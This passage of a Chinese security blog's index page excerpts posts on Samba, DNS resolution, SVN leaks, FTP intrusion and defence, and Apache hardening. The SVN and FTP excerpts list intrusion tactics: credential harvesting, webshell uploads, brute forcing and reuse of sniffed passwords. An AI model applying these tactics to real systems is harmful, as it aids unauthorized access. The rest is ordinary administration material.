<p>0x01 关于smaba<br><figure class="highlight xml"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div></pre></td><td class="code"><pre><div class="line">主要用于实现不同系统平台间的文件共享,配置非常简单,轻量,适合用于常规办公内网环境中</div><div class="line">linux <span class="tag"><<span class="name">==</span>></span> windows <span class="tag"><<span class="name">==</span>></span> unix</div></pre></td></tr></table></figure></p>
<p>此次演示环境<br><figure class="highlight x86asm"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div></pre></td><td class="code"><pre><div class="line">CentOS6<span class="meta">.9</span> x86_64 <span class="built_in">ip</span>:<span class="number">192.168</span><span class="meta">.3</span><span class="meta">.55</span> samba服务器</div><div class="line">CentOS6<span class="meta">.9</span> x86_64 <span class="built_in">ip</span>:<span class="number">192.168</span><span class="meta">.3</span><span class="meta">.57</span> 用来模拟smb客户端进行访问测试</div></pre></td></tr></table></figure></p>
<p>0x02 samba服务默认所监听的端口<br><figure class="highlight routeros"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div></pre></td><td class="code"><pre><div class="line">137/udp,138/udp nmb 进程提供netbios解析,以满足基于 CIFS 协议的共享访问环境</div><div class="line">138/tcp,445/tcp<span class="built_in"> smb </span>进程主要为客户端提供文件共享,打印机服务以及用户权限验证</div></pre></td></tr></table></figure></p>
<p>0x03 使用samba客户端工具 <code>smbclient</code>,其实有些类似于ftp的客户端工具,也是一种交互式的访问</p>
<p><code>在linux下使用smbclient访问windows中的共享目录</code><br><figure class="highlight shell"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div></pre></td><td class="code"><pre><div class="line"><span class="meta">#</span><span class="bash"> smbclient -L 192.168.3.23 -U administrator</span></div><div class="line"><span class="meta">#</span><span class="bash"> smbclient //192.168.3.23/linux_dir -U dcadmin</span></div><div class="line"><span class="meta">#</span><span class="bash"> mount -t cifs //192.168.3.23/linux_dir /mnt/windows/ -o username=dcadmin 注意,此处要使用cifs协议进行挂载</span></div></pre></td></tr></table></figure></p>
</div>
<a href="/2017/12/12/samba-sec/" class="read-more">Read More</a>
</div>
<div class="post">
<div class="post-header index">
<h1 class="title">
<a href="/2017/12/11/Dns-tips/">
DNS 深度理解 [ 一 ]
</a>
</h1>
<div class="post-info">
<span class="date">2017-12-11</span>
<span class="category">
<a href="/categories/DNS-深度理解/">DNS 深度理解</a>
</span>
</div>
</div>
<div class="content">
<p>0x01 首先,我们先来简单回顾下<code>DNS的基本解析流程</code>, 比较简单,如下<br><figure class="highlight haml"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div></pre></td><td class="code"><pre><div class="line">-<span class="ruby">> 以客户端浏览器访问 www.rootkit.org 域名为例,首先,它会去检查当前浏览器缓存,如果有,就直接响应,如果没有,就继续往下找</span></div><div class="line"> -<span class="ruby">> 接着,操作系统会去检查自己的host文件,如果从中没找到对应关系,会再到系统dns缓存中查,如果缓存中有,就直接返回该域名所对应的ip</span></div><div class="line"> -<span class="ruby">> 如果缓存中没有,则会向我们事先设置好的dns服务器 [ 一般有两个, 主 & 备 ] 去请求,即所谓的<span class="string">`递归查询`</span>,dns服务器首先会到自身解析数据库中去查</span></div><div class="line"> -<span class="ruby">> 如果dns服务器在自己的解析库中也没找到,它就会自动帮我们向根发送询问请求</span></div><div class="line"> -<span class="ruby">> 此时,根看到要请求的是org的后缀,就会把org所在的ns服务器告诉我们的dns</span></div><div class="line"> -<span class="ruby">> 然后,我们的dns服务器就会去请求org所在的ns服务器</span></div><div class="line"> -<span class="ruby">> 当请求到达org ns服务器时,org一看域名是在rootkit这个域下的,就会把rootkit所在的ns服务器再告诉我们的dns服务器</span></div><div class="line"> -<span class="ruby">> 再然后,我们的dns服务器就会去请求rootkit这个域的ns服务器</span></div><div class="line"> -<span class="ruby">> rootkit这个域的ns服务器一看是要访问www就直接找到了www对应的A记录的ip,并把它丢给我们的dns,上面逐个询问的过程,即 <span class="string">`迭代查询`</span></span></div><div class="line"> -<span class="ruby">> 最后,我们的dns再把最终解析到的这个ip丢给我们的客户端,然后客户端就直接拿着去访问了,如下,访问google.com时的简易流程图</span></div></pre></td></tr></table></figure></p>
</div>
<a href="/2017/12/11/Dns-tips/" class="read-more">Read More</a>
</div>
<div class="post">
<div class="post-header index">
<h1 class="title">
<a href="/2017/12/10/svn-config-sec/">
不再让 `泄露` 拖你的后腿 [ subversion篇 ]
</a>
</h1>
<div class="post-info">
<span class="date">2017-12-10</span>
<span class="category">
<a href="/categories/svn/">svn</a>
</span>
</div>
</div>
<div class="content">
<p>0x01 关于 svn<br><figure class="highlight clean"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div></pre></td><td class="code"><pre><div class="line">同属C/S架构,对于svn服务端来讲,任何一个文件,在任何时刻的变化,都会被svn详细记录,并自动备份修改之前的结果,方便后续回滚</div><div class="line">其实,底层也是靠一个独立的`文件系统 FSFS`在维护,更多内部工作细节,大家可以直接去参考百科说明,此处废话不多讲,我们真奔主题...</div><div class="line">...</div></pre></td></tr></table></figure></p>
<p>演示环境,注,此处为独立部署svn服务器,并非配合web服务一起使用<br><figure class="highlight css"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div></pre></td><td class="code"><pre><div class="line"><span class="selector-tag">CentOS6</span><span class="selector-class">.9_x86_64</span> <span class="selector-tag">ip</span>: 192<span class="selector-class">.168</span><span class="selector-class">.3</span><span class="selector-class">.59</span></div><div class="line"><span class="selector-tag">win7cn</span> <span class="selector-tag">ip</span>: 192<span class="selector-class">.168</span><span class="selector-class">.3</span><span class="selector-class">.70</span></div></pre></td></tr></table></figure></p>
<p>0x02 作为一名入侵者,从<code>svn</code>中你都能发掘到什么宝藏<br><figure class="highlight clean"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div></pre></td><td class="code"><pre><div class="line">可能最容易拿到的就是数据库的各种连接账号密码,前提是,目标数据库允许外连,这样你才能更优雅的脱裤或者想办法构造上传webshell</div><div class="line">一些邮箱账号密码,如果目标有自己的vpn或者owa之类的入口还是很值得尝试的</div><div class="line">直接的后端代码,除了能局部审下代码之外,在注释里面也许还能看到一些关于开发人员的敏感信息</div><div class="line">其它的各种敏感配置信息,非常多,这里就不一一细说了</div><div class="line">注意,有些信息,确实不能让我们一刀毙敌,但高效的渗透往往是对各类敏感信息的相互配合及深度利用,这非常重要</div><div class="line">...</div></pre></td></tr></table></figure></p>
</div>
<a href="/2017/12/10/svn-config-sec/" class="read-more">Read More</a>
</div>
<div class="post">
<div class="post-header index">
<h1 class="title">
<a href="/2017/12/09/vsftp-secfig/">
简述 FTP 入侵与防御 [ vsftpd ]
</a>
</h1>
<div class="post-info">
<span class="date">2017-12-09</span>
<span class="category">
<a href="/categories/vsftp/">vsftp</a>
</span>
</div>
</div>
<div class="content">
<p>0x01 首先,我们先来简单思考下,当你面对一台 ftp 时,到底能做些什么<br><figure class="highlight applescript"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div></pre></td><td class="code"><pre><div class="line">挖<span class="number">0</span><span class="built_in">day</span>,抱歉,并不在今天的讨论范畴 ^_^</div><div class="line">允许匿名可写,直接上传webshell,一般极小的个人站才有可能,ftp目录即网站目录</div><div class="line">允许匿名下载,造成的敏感文件信息泄露</div><div class="line">爆破,亦可造成敏感配置泄露</div><div class="line">嗅探,搜集各种明文账号密码,然后再拿着这些账号密码,去撞目标的其它入口,或以此进行进一步的内网渗透</div><div class="line">提权,linux平台下基本不可能</div><div class="line">...</div></pre></td></tr></table></figure></p>
<p>0x02 相对主流的一些ftp工具<br><figure class="highlight gams"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line"><span class="function"><span class="title">vsftpd</span></span> proftpd filezilla ...</div></pre></td></tr></table></figure></p>
<p>0x03 深入理解ftp的主动与被动工作模式</p>
<p><code>命令连接</code><br><figure class="highlight autohotkey"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div></pre></td><td class="code"><pre><div class="line">在客户端向ftp服务端发起连接请求时,客户端会随机选择本地的某个tcp端口与ftp服务端的<span class="number">21</span>端口进行连接</div><div class="line">这中间会进行一系列的身份验证过程,待验证通过后,客户端与ftp服务端即会成功建立 `命令连接`</div><div class="line">所谓的 `命令传输连接` 也就是说,仅仅只会用这个连接来传输命令本身</div></pre></td></tr></table></figure></p>
<p><code>主动模式</code><br><figure class="highlight clean"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div></pre></td><td class="code"><pre><div class="line">在 `命令连接` 建立成功后,客户端可能还需要进行一系列的数据传输动作,如,上传,下载文件...</div><div class="line">此时,客户端会先在本地另启一个端口监听等待连接,并利用先前与ftp客户端建立好的`命令连接`通道,告诉ftp服务端客户端所监听的端口</div><div class="line">而后,ftp服务端会利用自身的<span class="number">20</span>端口和刚才ftp客户端所告知的端口进行数据连接,随后就开始利用此连接来进行各类数据传输</div><div class="line">注意,此时`数据连接`在建立的过程中,是ftp服务端的<span class="number">20</span>端口主动连接FTP客户端的随机端口的,也就是我们所说的`主动模式`</div></pre></td></tr></table></figure></p>
</div>
<a href="/2017/12/09/vsftp-secfig/" class="read-more">Read More</a>
</div>
<div class="post">
<div class="post-header index">
<h1 class="title">
<a href="/2017/11/26/apache-sec/">
如何将你的 apache 把控的'密不透风'
</a>
</h1>
<div class="post-info">
<span class="date">2017-11-26</span>
<span class="category">
<a href="/categories/apachesec/">apachesec</a>
</span>
</div>
</div>
<div class="content">
<p>0x01 为防止配置或端口冲突,在装之前,你需要先仔细检查当前系统有没有装apache,如果有<code>先把apache服务停掉,然后卸载apache</code>,等会儿用源码重新编译安装<br><figure class="highlight shell"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div></pre></td><td class="code"><pre><div class="line"><span class="meta">#</span><span class="bash"> rpm -qa httpd</span></div><div class="line"><span class="meta">#</span><span class="bash"> rpm -e --nodeps * 强制卸载apache</span></div></pre></td></tr></table></figure></p>
<p>演示环境<br><figure class="highlight css"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div></pre></td><td class="code"><pre><div class="line"><span class="selector-tag">CentOS6</span><span class="selector-class">.8</span> <span class="selector-tag">x86_64</span> 最小化,带基础库安装 <span class="selector-tag">eth0</span> : 192<span class="selector-class">.168</span><span class="selector-class">.3</span><span class="selector-class">.45</span> <span class="selector-tag">eth1</span> : 192<span class="selector-class">.168</span><span class="selector-class">.4</span><span class="selector-class">.16</span> <span class="selector-tag">eth2</span> : 192<span class="selector-class">.168</span><span class="selector-class">.5</span><span class="selector-class">.16</span></div><div class="line"><span class="selector-tag">httpd-2</span><span class="selector-class">.2</span><span class="selector-class">.34</span><span class="selector-class">.tar</span><span class="selector-class">.gz</span> <span class="selector-tag">apache</span>官方提供的源码包</div></pre></td></tr></table></figure></p>
<p>0x02 下载apache源码包,这里暂时选择2.2.x系列的最新版,不建议再用比这个还老的版本了,漏洞比较多<br><figure class="highlight shell"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div></pre></td><td class="code"><pre><div class="line"><span class="meta">#</span><span class="bash"> wget http://apache.website-solution.net/httpd/httpd-2.2.34.tar.gz</span></div><div class="line"><span class="meta">#</span><span class="bash"> tar xf httpd-2.2.34.tar.gz && <span class="built_in">cd</span> httpd-2.2.34</span></div></pre></td></tr></table></figure></p>
<p>0x03 直接到源码中去<code>改掉apache的详细版本信息</code>,跟部署nginx一样,尽可能地扰乱入侵者的判断,这里就把它模拟成IIS 7.5,实际系统应为win server 2008r2<br><figure class="highlight autoit"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line"><span class="meta"># vi <span class="meta-keyword">include</span>/ap_release.h</span></div></pre></td></tr></table></figure></p>
</div>
<a href="/2017/11/26/apache-sec/" class="read-more">Read More</a>
</div>
</section>
</div>
</div>
<div class="row">
<div class="col-sm-12">
<div class="wrap-pagination">
<a class="disabled" href="/">
<i class="fa fa-chevron-left" aria-hidden="true"></i>
</a>
<a class="" href="/page/2/">
<i class="fa fa-chevron-right" aria-hidden="true"></i>
</a>
</div>
</div>
</div>
</div>
<!-- Footer -->
<div class="push"></div>
<footer class="footer-content">
<center>
<span>有偿提供各类全面靠谱的安全优化加固方案,入侵取证及全方位企业内部及个人网络安全培训...<font color="red"> klion@protonmail.com</span><br>
<br>
<br>
<font size="5" color="#00FF7F" style="margin-left=-10px;">关注公众号</font> <font size="5" color="#00FF7F">随意捐助 [ 微信 ]</font> <font size="5" color="#00FF7F">加入小密圈</font>
<br>
<br>
<img src="/img/small.jpg" alt="klionsec" />
<img src="/img/klion.png" with="262" height="254" alt="klionsec" /> <img src="/img/xiaomi.png" with="260" height="257">
<br><br>
<br><font color="yellow" size="4">
如果觉得内容还不错,也希望您能高抬贵手帮忙转发一下,让更多需要的人都能看到,本人不胜感激
</font><br><br>
<font color="#00FF7F" size="4">
相信您的支持和鼓励换来的将会是更高质量的不懈创作,本人将一直秉承博客初衷,坚持高质量原创实用干货分享</font>
<br><br><script async src="//dn-lbstatics.qbox.me/busuanzi/2.3/busuanzi.pure.mini.js"></script>
<span id="busuanzi_container_site_pv">博客累计访问量 <span id="busuanzi_value_site_pv"></span> </span>
<span id="busuanzi_container_site_uv">
累计访客数 <span id="busuanzi_value_site_uv"></span>
</span>
<span id="showDays"></span>
<script>
var birthDay = new Date("12/28/2014");
var now = new Date();
var duration = now.getTime() - birthDay.getTime();
var total= Math.floor(duration / (1000 * 60 * 60 * 24));
document.getElementById("showDays").innerHTML = " 其实,博客已默默独自坚挺了 "+total+" 天";
</script>
<br>
<br>
多年实战渗透经验积累[大中小型网络] + 娴熟的底层及脚本编写能力 + 熟练的协议分析能力 + 多个大中型安全架构实际设计部署经验 + 良好的逆向分析能力[一定的0day挖掘能力] = 合格安全架构师
<br>
<br>
<br>
<font size=6 color="white">唯一不变的,就是一直在变</font>
<div class="container">
<div class="row">
<div class="col-xs-12 col-sm-12 col-md-12 col-lg-12">
<ul class="list-inline footer-social-icons">
<li class="list-inline-item">
<a href="https://github.com/klionsec">
<span class="footer-icon-container">
<i class="fa fa-github"></i>
</span>
</a>
</li>
<li class="list-inline-item">
<a href="https://twitter.com/klionsec">
<span class="footer-icon-container">
<i class="fa fa-twitter"></i>
</span>
</a>
</li>
<li class="list-inline-item">
<a href="https://www.facebook.com/klionsec">
<span class="footer-icon-container">
<i class="fa fa-facebook"></i>
</span>
</a>
</li>
<li class="list-inline-item">
<a href="http://www.jianshu.com/u/2a4d8b1f03e0">
<span class="footer-icon-container">
<i class="fa fa-instagram"></i>
</span>
</a>
</li>
<li class="list-inline-item">
<a href="https://www.zhihu.com/people/klionsec/activities">
<span class="footer-icon-container">
<i class="fa fa-dribbble"></i>
</span>
</a>
</li>
<li class="list-inline-item">
<a href="mailto:klion@protonmail.com">
<span class="footer-icon-container">
<i class="fa fa-envelope-o"></i>
</span>
</a>
</li>
</ul>
</div>
</div>
<div class="row">
<div class="col-xs-12 col-sm-12 col-md-12 col-lg-12">
<div class="footer-copyright">
<strong><font size=4 color=#00FF7F> Blog by klionsec </font></strong>
</div>
</div>
</div>
</div>
<!--
<audio autoplay="autoplay" width="300" height="200">
<source src="/img/Bandari - Childhood Memory.mp3" type="audio/mpeg" />
</audio>
-->
</footer>
<!-- After footer scripts -->
<!-- jQuery -->
<script src="//code.jquery.com/jquery-2.1.4.min.js"></script>
<!-- Tween Max -->
<script src="//cdnjs.cloudflare.com/ajax/libs/gsap/1.18.5/TweenMax.min.js"></script>
<!-- Gallery -->
<script src="//cdnjs.cloudflare.com/ajax/libs/featherlight/1.3.5/featherlight.min.js" type="text/javascript" charset="utf-8"></script>
<!-- Custom JavaScript -->
<script src="/js/main.js"></script>
<!-- Disqus Comments -->
</body>
</html>